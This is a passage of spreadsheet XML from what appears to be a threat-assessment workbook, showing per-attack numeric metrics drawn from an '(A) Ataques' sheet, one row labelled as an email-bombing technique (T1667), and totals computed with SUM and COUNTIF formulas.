        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!BZ111,"")</f>
        <v>6</v>
      </c>
      <c r="AA111" s="392">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!CB111,"")</f>
        <v>6</v>
      </c>
      <c r="AB111" s="4">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!CD111,"")</f>
        <v>2</v>
      </c>
      <c r="AC111" s="20">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!CE111,"")</f>
        <v>3</v>
      </c>
      <c r="AD111" s="331">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF(Z111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CF111,"")</f>
        <v>292</v>
      </c>
      <c r="AF111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CH111,"")</f>
        <v>17</v>
      </c>
      <c r="AG111" s="4">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CJ111,"")</f>
        <v>6</v>
      </c>
      <c r="AH111" s="20">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CK111,"")</f>
        <v>10</v>
      </c>
      <c r="AI111" s="287">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($AE111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ111" s="292">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CL111,"")</f>
        <v>0</v>
      </c>
      <c r="AK111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CN111,"")</f>
        <v>0</v>
      </c>
      <c r="AL111" s="4">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CP111,"")</f>
        <v>0</v>
      </c>
      <c r="AM111" s="20">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CQ111,"")</f>
        <v>0</v>
      </c>
      <c r="AN111" s="331">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($AJ111=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CR111,"")</f>
        <v>4</v>
      </c>
      <c r="AP111" s="322">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CT111,"")</f>
        <v>1</v>
      </c>
      <c r="AQ111" s="4">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CV111,"")</f>
        <v>1</v>
      </c>
      <c r="AR111" s="20">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!$CW111,"")</f>
        <v>1</v>
      </c>
      <c r="AS111" s="287">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($AO111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT111" s="288">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!CX111,"")</f>
        <v>22</v>
      </c>
      <c r="AU111" s="392">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!CZ111,"")</f>
        <v>5</v>
      </c>
      <c r="AV111" s="4">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!DB111,"")</f>
        <v>3</v>
      </c>
      <c r="AW111" s="20">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",'(A) Ataques'!DC111,"")</f>
        <v>5</v>
      </c>
      <c r="AX111" s="331">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($AT111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY111" s="469">
        <f>'(A) Ataques'!LU111+'(A) Ataques'!MA111+'(A) Ataques'!MG111+'(A) Ataques'!MM111+'(A) Ataques'!MS111</f>
        <v>9</v>
      </c>
      <c r="AZ111" s="510">
        <f>'(A) Ataques'!LW111+'(A) Ataques'!MC111+'(A) Ataques'!MI111+'(A) Ataques'!MO111+'(A) Ataques'!MU111</f>
        <v>5</v>
      </c>
      <c r="BA111" s="471">
        <f>'(A) Ataques'!LY111+'(A) Ataques'!ME111+'(A) Ataques'!MK111+'(A) Ataques'!MQ111+'(A) Ataques'!MW111</f>
        <v>2</v>
      </c>
      <c r="BB111" s="471">
        <f>'(A) Ataques'!LQ111</f>
        <v>4</v>
      </c>
      <c r="BC111" s="331">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($AY111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD111" s="469">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!LL111,"")</f>
        <v>22</v>
      </c>
      <c r="BE111" s="510">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!LM111,"")</f>
        <v>18</v>
      </c>
      <c r="BF111" s="471">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!LN111,"")</f>
        <v>2</v>
      </c>
      <c r="BG111" s="471">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!LO111,"")</f>
        <v>6</v>
      </c>
      <c r="BH111" s="471">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!LS111,"")</f>
        <v>10</v>
      </c>
      <c r="BI111" s="331">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($BD111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ111" s="469">
        <f>'(A) Ataques'!OL111+'(A) Ataques'!OR111+'(A) Ataques'!OX111+'(A) Ataques'!PD111+'(A) Ataques'!PJ111</f>
        <v>18</v>
      </c>
      <c r="BK111" s="510">
        <f>'(A) Ataques'!ON111+'(A) Ataques'!OT111+'(A) Ataques'!OZ111+'(A) Ataques'!PF111+'(A) Ataques'!PL111</f>
        <v>9</v>
      </c>
      <c r="BL111" s="471">
        <f>'(A) Ataques'!OP111+'(A) Ataques'!OV111+'(A) Ataques'!PB111+'(A) Ataques'!PH111+'(A) Ataques'!PN111</f>
        <v>3</v>
      </c>
      <c r="BM111" s="495">
        <f>'(A) Ataques'!OH111</f>
        <v>6</v>
      </c>
      <c r="BN111" s="331">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($BJ111=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO111" s="469">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!OC111,"")</f>
        <v>18</v>
      </c>
      <c r="BP111" s="510">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!OD111,"")</f>
        <v>9</v>
      </c>
      <c r="BQ111" s="471">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!OE111,"")</f>
        <v>3</v>
      </c>
      <c r="BR111" s="471">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!OF111,"")</f>
        <v>1</v>
      </c>
      <c r="BS111" s="471">
        <f>IF('(A) Ataques'!$AP111&lt;&gt;"NO",'(A) Ataques'!OJ111,"")</f>
        <v>6</v>
      </c>
      <c r="BT111" s="331">
        <f>IF('(A) Ataques'!$AK111&lt;&gt;"NO",IF($BO111=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="112" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A112" s="79">
        <f t="shared" si="1"/>
        <v>110</v>
      </c>
      <c r="B112" s="4">
        <f>IF('(A) Ataques'!AK112&lt;&gt;"NO",'(A) Ataques'!E112,"")</f>
        <v>76</v>
      </c>
      <c r="C112" s="6" t="str">
        <f>IF('(A) Ataques'!AK112&lt;&gt;"NO",IF('(A) Ataques'!M112="","",'(A) Ataques'!M112),"")</f>
        <v>T1667-Email_bombing</v>
      </c>
      <c r="D112" s="4" t="str">
        <f>IF('(A) Ataques'!AK112&lt;&gt;"NO",'(A) Ataques'!F112,"")</f>
        <v>T1667</v>
      </c>
      <c r="E112" s="286">
        <f>IF('(A) Ataques'!AK112&lt;&gt;"NO",'(A) Ataques'!AQ112,"")</f>
        <v>100</v>
      </c>
      <c r="F112" s="288">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!BB112,"")</f>
        <v>2</v>
      </c>
      <c r="G112" s="392">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!BD112,"")</f>
        <v>2</v>
      </c>
      <c r="H112" s="4">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!BF112,"")</f>
        <v>1</v>
      </c>
      <c r="I112" s="531">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!BG112,"")</f>
        <v>2</v>
      </c>
      <c r="J112" s="530">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($F112=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BH112,"")</f>
        <v>0</v>
      </c>
      <c r="L112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BJ112,"")</f>
        <v>0</v>
      </c>
      <c r="M112" s="4">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BL112,"")</f>
        <v>0</v>
      </c>
      <c r="N112" s="531">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BM112,"")</f>
        <v>0</v>
      </c>
      <c r="O112" s="532">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($K112=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P112" s="292">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BN112,"")</f>
        <v>2</v>
      </c>
      <c r="Q112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BP112,"")</f>
        <v>2</v>
      </c>
      <c r="R112" s="4">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BR112,"")</f>
        <v>1</v>
      </c>
      <c r="S112" s="531">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BS112,"")</f>
        <v>2</v>
      </c>
      <c r="T112" s="530">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($P112=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BT112,"")</f>
        <v>2</v>
      </c>
      <c r="V112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BV112,"")</f>
        <v>2</v>
      </c>
      <c r="W112" s="4">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BX112,"")</f>
        <v>1</v>
      </c>
      <c r="X112" s="531">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$BY112,"")</f>
        <v>2</v>
      </c>
      <c r="Y112" s="532">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($U112=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z112" s="288">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!BZ112,"")</f>
        <v>4</v>
      </c>
      <c r="AA112" s="392">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!CB112,"")</f>
        <v>2</v>
      </c>
      <c r="AB112" s="4">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!CD112,"")</f>
        <v>2</v>
      </c>
      <c r="AC112" s="20">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!CE112,"")</f>
        <v>1</v>
      </c>
      <c r="AD112" s="331">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF(Z112=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CF112,"")</f>
        <v>6</v>
      </c>
      <c r="AF112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CH112,"")</f>
        <v>4</v>
      </c>
      <c r="AG112" s="4">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CJ112,"")</f>
        <v>3</v>
      </c>
      <c r="AH112" s="20">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CK112,"")</f>
        <v>3</v>
      </c>
      <c r="AI112" s="287">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($AE112=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ112" s="292">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CL112,"")</f>
        <v>0</v>
      </c>
      <c r="AK112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CN112,"")</f>
        <v>0</v>
      </c>
      <c r="AL112" s="4">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CP112,"")</f>
        <v>0</v>
      </c>
      <c r="AM112" s="20">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CQ112,"")</f>
        <v>0</v>
      </c>
      <c r="AN112" s="331">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($AJ112=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CR112,"")</f>
        <v>0</v>
      </c>
      <c r="AP112" s="322">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CT112,"")</f>
        <v>0</v>
      </c>
      <c r="AQ112" s="4">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CV112,"")</f>
        <v>0</v>
      </c>
      <c r="AR112" s="20">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!$CW112,"")</f>
        <v>0</v>
      </c>
      <c r="AS112" s="287">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($AO112=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT112" s="288">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!CX112,"")</f>
        <v>2</v>
      </c>
      <c r="AU112" s="392">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!CZ112,"")</f>
        <v>2</v>
      </c>
      <c r="AV112" s="4">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!DB112,"")</f>
        <v>1</v>
      </c>
      <c r="AW112" s="20">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",'(A) Ataques'!DC112,"")</f>
        <v>2</v>
      </c>
      <c r="AX112" s="331">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($AT112=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY112" s="469">
        <f>'(A) Ataques'!LU112+'(A) Ataques'!MA112+'(A) Ataques'!MG112+'(A) Ataques'!MM112+'(A) Ataques'!MS112</f>
        <v>0</v>
      </c>
      <c r="AZ112" s="510">
        <f>'(A) Ataques'!LW112+'(A) Ataques'!MC112+'(A) Ataques'!MI112+'(A) Ataques'!MO112+'(A) Ataques'!MU112</f>
        <v>0</v>
      </c>
      <c r="BA112" s="471">
        <f>'(A) Ataques'!LY112+'(A) Ataques'!ME112+'(A) Ataques'!MK112+'(A) Ataques'!MQ112+'(A) Ataques'!MW112</f>
        <v>0</v>
      </c>
      <c r="BB112" s="471">
        <f>'(A) Ataques'!LQ112</f>
        <v>0</v>
      </c>
      <c r="BC112" s="331">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($AY112=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD112" s="469">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!LL112,"")</f>
        <v>100</v>
      </c>
      <c r="BE112" s="510">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!LM112,"")</f>
        <v>100</v>
      </c>
      <c r="BF112" s="471">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!LN112,"")</f>
        <v>0</v>
      </c>
      <c r="BG112" s="471">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!LO112,"")</f>
        <v>1</v>
      </c>
      <c r="BH112" s="471">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!LS112,"")</f>
        <v>100</v>
      </c>
      <c r="BI112" s="331">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($BD112=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ112" s="469">
        <f>'(A) Ataques'!OL112+'(A) Ataques'!OR112+'(A) Ataques'!OX112+'(A) Ataques'!PD112+'(A) Ataques'!PJ112</f>
        <v>0</v>
      </c>
      <c r="BK112" s="510">
        <f>'(A) Ataques'!ON112+'(A) Ataques'!OT112+'(A) Ataques'!OZ112+'(A) Ataques'!PF112+'(A) Ataques'!PL112</f>
        <v>0</v>
      </c>
      <c r="BL112" s="471">
        <f>'(A) Ataques'!OP112+'(A) Ataques'!OV112+'(A) Ataques'!PB112+'(A) Ataques'!PH112+'(A) Ataques'!PN112</f>
        <v>0</v>
      </c>
      <c r="BM112" s="495">
        <f>'(A) Ataques'!OH112</f>
        <v>0</v>
      </c>
      <c r="BN112" s="331">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($BJ112=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO112" s="469">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!OC112,"")</f>
        <v>0</v>
      </c>
      <c r="BP112" s="510">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!OD112,"")</f>
        <v>0</v>
      </c>
      <c r="BQ112" s="471">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!OE112,"")</f>
        <v>0</v>
      </c>
      <c r="BR112" s="471">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!OF112,"")</f>
        <v>0</v>
      </c>
      <c r="BS112" s="471">
        <f>IF('(A) Ataques'!$AP112&lt;&gt;"NO",'(A) Ataques'!OJ112,"")</f>
        <v>0</v>
      </c>
      <c r="BT112" s="331">
        <f>IF('(A) Ataques'!$AK112&lt;&gt;"NO",IF($BO112=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="113" spans="1:73" ht="15" customHeight="1" thickTop="1">
      <c r="A113" s="742" t="s">
        <v>176</v>
      </c>
      <c r="B113" s="743"/>
      <c r="C113" s="743"/>
      <c r="D113" s="743"/>
      <c r="E113" s="398">
        <f>SUM(E2:E112)</f>
        <v>3573695</v>
      </c>
      <c r="F113" s="400">
        <f>SUM(F2:F112)</f>
        <v>37259</v>
      </c>
      <c r="G113" s="399">
        <f>SUM(G2:G112)</f>
        <v>13523</v>
      </c>
      <c r="H113" s="332">
        <f>SUM(H2:H112)</f>
        <v>171</v>
      </c>
      <c r="I113" s="332">
        <f>SUM(I2:I112)</f>
        <v>13051</v>
      </c>
      <c r="J113" s="334">
        <f>SUM(J2:J112)/$A$112</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="K113" s="399">
        <f>SUM(K2:K112)</f>
        <v>13179</v>
      </c>
      <c r="L113" s="399">
        <f>SUM(L2:L112)</f>
        <v>4968</v>
      </c>
      <c r="M113" s="332">
        <f>SUM(M2:M112)</f>
        <v>301</v>
      </c>
      <c r="N113" s="332">
        <f>SUM(N2:N112)</f>
        <v>3229</v>
      </c>
      <c r="O113" s="333">
        <f>SUM(O2:O112)/$A$112</f>
        <v>0.46363636363636362</v>
      </c>
      <c r="P113" s="400">
        <f>SUM(P2:P112)</f>
        <v>50438</v>
      </c>
      <c r="Q113" s="399">
        <f>SUM(Q2:Q112)</f>
        <v>18491</v>
      </c>
      <c r="R113" s="332">
        <f>SUM(R2:R112)</f>
        <v>472</v>
      </c>
      <c r="S113" s="332">
        <f>SUM(S2:S112)</f>
        <v>15080</v>
      </c>
      <c r="T113" s="334">
        <f>SUM(T2:T112)/$A$112</f>
        <v>0.8</v>
      </c>
      <c r="U113" s="399">
        <f>SUM(U2:U112)</f>
        <v>1799319</v>
      </c>
      <c r="V113" s="399">
        <f>SUM(V2:V112)</f>
        <v>383176</v>
      </c>
      <c r="W113" s="332">
        <f>SUM(W2:W112)</f>
        <v>962</v>
      </c>
      <c r="X113" s="332">
        <f>SUM(X2:X112)</f>
        <v>206693</v>
      </c>
      <c r="Y113" s="333">
        <f>SUM(Y2:Y112)/$A$112</f>
        <v>0.94545454545454544</v>
      </c>
      <c r="Z113" s="400">
        <f>SUM(Z2:Z112)</f>
        <v>367811</v>
      </c>
      <c r="AA113" s="399">
        <f>SUM(AA2:AA112)</f>
        <v>192858</v>
      </c>
      <c r="AB113" s="332">
        <f>SUM(AB2:AB112)</f>
        <v>1056</v>
      </c>
      <c r="AC113" s="332">
        <f>SUM(AC2:AC112)</f>
        <v>127698</v>
      </c>
      <c r="AD113" s="334">
        <f>SUM(AD2:AD112)/$A$112</f>
        <v>1</v>
      </c>
      <c r="AE113" s="399">
        <f>SUM(AE2:AE112)</f>
        <v>2157395</v>
      </c>
      <c r="AF113" s="399">
        <f>SUM(AF2:AF112)</f>
        <v>572909</v>
      </c>
      <c r="AG113" s="332">
        <f>SUM(AG2:AG112)</f>
        <v>2013</v>
      </c>
      <c r="AH113" s="332">
        <f>SUM(AH2:AH112)</f>
        <v>268349</v>
      </c>
      <c r="AI113" s="333">
        <f>SUM(AI2:AI112)/$A$112</f>
        <v>1</v>
      </c>
      <c r="AJ113" s="400">
        <f>SUM(AJ2:AJ112)</f>
        <v>16</v>
      </c>
      <c r="AK113" s="399">
        <f>SUM(AK2:AK112)</f>
        <v>2</v>
      </c>
      <c r="AL113" s="332">
        <f>SUM(AL2:AL112)</f>
        <v>2</v>
      </c>
      <c r="AM113" s="332">
        <f>SUM(AM2:AM112)</f>
        <v>1</v>
      </c>
      <c r="AN113" s="334">
        <f>SUM(AN2:AN112)/$A$112</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="AO113" s="399">
        <f>SUM(AO2:AO112)</f>
        <v>25704</v>
      </c>
      <c r="AP113" s="399">
        <f>SUM(AP2:AP112)</f>
        <v>8207</v>
      </c>
      <c r="AQ113" s="332">
        <f>SUM(AQ2:AQ112)</f>
        <v>518</v>
      </c>
      <c r="AR113" s="332">
        <f>SUM(AR2:AR112)</f>
        <v>4168</v>
      </c>
      <c r="AS113" s="333">
        <f>SUM(AS2:AS112)/$A$112</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="AT113" s="400">
        <f>SUM(AT2:AT112)</f>
        <v>76126</v>
      </c>
      <c r="AU113" s="399">
        <f>SUM(AU2:AU112)</f>
        <v>26696</v>
      </c>
      <c r="AV113" s="332">
        <f>SUM(AV2:AV112)</f>
        <v>988</v>
      </c>
      <c r="AW113" s="332">
        <f>SUM(AW2:AW112)</f>
        <v>16148</v>
      </c>
      <c r="AX113" s="334">
        <f>SUM(AX2:AX112)/$A$112</f>
        <v>0.88181818181818183</v>
      </c>
      <c r="AY113" s="400">
        <f>SUM(AY2:AY112)</f>
        <v>656996</v>
      </c>
      <c r="AZ113" s="399">
        <f>SUM(AZ2:AZ112)</f>
        <v>655847</v>
      </c>
      <c r="BA113" s="332">
        <f>SUM(BA2:BA112)</f>
        <v>220</v>
      </c>
      <c r="BB113" s="332">
        <f>SUM(BB2:BB112)</f>
        <v>654937</v>
      </c>
      <c r="BC113" s="334">
        <f>SUM(BC2:BC112)/$A$112</f>
        <v>0.6</v>
      </c>
      <c r="BD113" s="400">
        <f>SUM(BD2:BD112)</f>
        <v>1989445</v>
      </c>
      <c r="BE113" s="399">
        <f>SUM(BE2:BE112)</f>
        <v>1977351</v>
      </c>
      <c r="BF113" s="332">
        <f>SUM(BF2:BF112)</f>
        <v>220</v>
      </c>
      <c r="BG113" s="332">
        <f>SUM(BG2:BG112)</f>
        <v>339</v>
      </c>
      <c r="BH113" s="332">
        <f>SUM(BH2:BH112)</f>
        <v>1022207</v>
      </c>
      <c r="BI113" s="334">
        <f>SUM(BI2:BI112)/$A$112</f>
        <v>0.95454545454545459</v>
      </c>
      <c r="BJ113" s="400">
        <f>SUM(BJ2:BJ112)</f>
        <v>3993092</v>
      </c>
      <c r="BK113" s="399">
        <f>SUM(BK2:BK112)</f>
        <v>2562119</v>
      </c>
      <c r="BL113" s="332">
        <f>SUM(BL2:BL112)</f>
        <v>251</v>
      </c>
      <c r="BM113" s="332">
        <f>SUM(BM2:BM112)</f>
        <v>2488158</v>
      </c>
      <c r="BN113" s="334">
        <f>SUM(BN2:BN112)/$A$112</f>
        <v>0.69090909090909092</v>
      </c>
      <c r="BO113" s="400">
        <f>SUM(BO2:BO112)</f>
        <v>3993092</v>
      </c>
      <c r="BP113" s="399">
        <f>SUM(BP2:BP112)</f>
        <v>2562120</v>
      </c>
      <c r="BQ113" s="332">
        <f>SUM(BQ2:BQ112)</f>
        <v>251</v>
      </c>
      <c r="BR113" s="332">
        <f>SUM(BR2:BR112)</f>
        <v>104</v>
      </c>
      <c r="BS113" s="332">
        <f>SUM(BS2:BS112)</f>
        <v>2488158</v>
      </c>
      <c r="BT113" s="334">
        <f>SUM(BT2:BT112)/$A$112</f>
        <v>0.69090909090909092</v>
      </c>
    </row>
    <row r="114" spans="1:73" ht="12.75">
      <c r="A114" s="80"/>
      <c r="B114" s="3"/>
      <c r="C114" s="1"/>
      <c r="D114" s="3"/>
      <c r="E114" s="3"/>
      <c r="F114" s="1"/>
      <c r="G114" s="1"/>
      <c r="H114" s="1"/>
      <c r="I114" s="1"/>
      <c r="J114" s="1"/>
      <c r="K114" s="1"/>
      <c r="L114" s="1"/>
      <c r="M114" s="1"/>
      <c r="N114" s="1"/>
      <c r="O114" s="1"/>
      <c r="P114" s="1"/>
      <c r="Q114" s="1"/>
      <c r="R114" s="1"/>
      <c r="S114" s="1"/>
      <c r="T114" s="1"/>
      <c r="U114" s="1"/>
      <c r="V114" s="1"/>
      <c r="W114" s="1"/>
      <c r="X114" s="1"/>
      <c r="Y114" s="1"/>
      <c r="AJ114" s="1"/>
      <c r="AK114" s="1"/>
      <c r="AL114" s="1"/>
      <c r="AM114" s="1"/>
      <c r="AN114" s="1"/>
      <c r="BN114" s="393"/>
      <c r="BT114" s="393"/>
      <c r="BU114" s="1"/>
    </row>
    <row r="115" spans="1:73" ht="25.5">
      <c r="A115" s="80"/>
      <c r="B115" s="3"/>
      <c r="C115" s="1"/>
      <c r="D115" s="3"/>
      <c r="E115" s="4" t="s">
        <v>2490</v>
      </c>
      <c r="F115" s="4">
        <f>COUNTIF(F3:F112,"&lt;&gt;0")</f>
        <v>80</v>
      </c>
      <c r="K115" s="4">
        <f>COUNTIF(K3:K112,"&lt;&gt;0")</f>
        <v>51</v>
      </c>
      <c r="P115" s="4">
        <f>COUNTIF(P3:P112,"&lt;&gt;0")</f>
        <v>88</v>
      </c>
      <c r="U115" s="4">
        <f>COUNTIF(U3:U112,"&lt;&gt;0")</f>
        <v>104</v>
      </c>
      <c r="Z115" s="4">
        <f>COUNTIF(Z3:Z112,"&lt;&gt;0")</f>
        <v>110</v>
      </c>
      <c r="AA115" s="4"/>
      <c r="AB115" s="4"/>
      <c r="AC115" s="4"/>
      <c r="AD115" s="4"/>
      <c r="AE115" s="4">
        <f>COUNTIF(AE3:AE112,"&lt;&gt;0")</f>
        <v>110</v>
      </c>
      <c r="AF115" s="4"/>
      <c r="AG115" s="4"/>
      <c r="AH115" s="4"/>
      <c r="AI115" s="4"/>
      <c r="AJ115" s="4">
        <f>COUNTIF(AJ3:AJ112,"&lt;&gt;0")</f>
        <v>1</v>
      </c>
      <c r="AK115" s="4"/>
      <c r="AL115" s="4"/>
      <c r="AM115" s="4"/>
      <c r="AN115" s="4"/>
      <c r="AO115" s="4">
        <f>COUNTIF(AO3:AO112,"&lt;&gt;0")</f>
        <v>56</v>
      </c>
      <c r="AP115" s="4"/>
      <c r="AQ115" s="4"/>
      <c r="AR115" s="4"/>
      <c r="AS115" s="4"/>
      <c r="AT115" s="4">
        <f>COUNTIF(AT3:AT112,"&lt;&gt;0")</f>
        <v>97</v>
      </c>
      <c r="AU115" s="4"/>
      <c r="AV115" s="4"/>
      <c r="AW115" s="4"/>
      <c r="AX115" s="4"/>
      <c r="AY115" s="4">
        <f>COUNTIF(AY3:AY112,"&lt;&gt;0")</f>
        <v>66</v>
      </c>
      <c r="AZ115" s="4"/>
      <c r="BA115" s="4"/>
      <c r="BB115" s="4"/>
      <c r="BC115" s="4"/>
      <c r="BD115" s="4">
        <f>COUNTIF(BD3:BD112,"&lt;&gt;0")</f>
        <v>105</v>
      </c>
      <c r="BE115" s="4"/>
